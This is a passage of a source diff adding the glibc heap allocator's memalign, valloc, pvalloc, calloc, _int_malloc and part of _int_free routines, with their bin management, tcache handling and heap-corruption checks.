+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr ("malloc(): memory corruption");
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
